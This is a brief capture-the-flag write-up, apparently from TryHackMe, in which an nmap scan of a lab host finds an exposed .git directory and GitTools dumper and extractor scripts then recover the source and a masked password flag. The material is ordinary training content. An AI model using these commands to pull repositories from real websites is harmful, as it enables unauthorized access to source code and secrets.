Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy!
Can you find the password to the application?
Setup
└──╼ $ nmap -A -T4 10.10.58.4180/tcp open http nginx 1.14.0 (Ubuntu)
| http-git:
| 10.10.58.41:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAs you can see the nmap scan found a “.git” repertory on the website, let’s use some tools to get all the data.
└──╼ $ ./gitdumper.sh http://10.10.58.41/.git/ .Once the dumper script get all the data let’s use the extractor script to have all the source code.
└──╼ $ ./extractor.sh ~/Desktop/TryHackMe/git-thm/GitTools/Dumper/ .
As you can see the script created some directory, let’s see if the password is in there.
#1 Find the Super Secret Password
Th**_**_*_****_****_******_*******!